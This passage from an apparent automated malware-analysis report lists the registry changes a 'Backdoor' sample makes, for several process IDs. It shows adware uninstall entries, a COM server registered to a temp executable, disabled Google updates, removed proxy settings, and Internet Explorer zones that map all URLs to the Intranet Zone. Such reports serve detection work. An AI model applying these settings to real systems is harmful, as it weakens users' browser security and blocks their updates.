[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1176 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"SilentUninstall" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayIcon" = "%System%\msiexec.exe"
"CategoryName" = "Apps"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"ProductName" = "WWhiteCouPooni"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"NoRepair" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"InstallDate" = "20150509"
"NoModify" = "1"
"UninstallString" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 3B 87 11 89 AB 78 A3 A9 D1 7F 07 27 F9 62 4E"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayName" = "WWhiteCouPooni"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1988 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"SilentUninstall" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"InstallDate" = "20140222"
"Publisher" = "ActiveCoupon"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"UninstallString" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayName" = "ActiveCoupon"
"NoModify" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"NoRepair" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 63 AF 00 98 6D 98 39 66 CA 6D B1 37 AD 6F F1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"ProductName" = "ActiveCoupon"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:368 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\""alpha_installer""/n]
"last" = "13075686372168"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 BC A7 08 2A EB 60 D1 52 C0 23 81 D7 42 92 6B"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1888 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F2 48 D7 33 BA 18 38 EE F1 A4 96 76 F7 F7 CC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
